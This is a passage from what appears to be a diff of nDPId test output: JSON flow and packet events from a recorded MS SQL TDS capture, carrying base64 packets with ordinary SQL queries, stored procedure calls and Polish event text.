BdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7560000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} +00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7560000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6A
CAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="} +02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvA
GQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="} +02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0
AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7560000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7560000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":35,"packets-processed":34,"total-skipped-flows":0,"total-l4-data-len":13137,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":8,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1278068444584} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7440000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 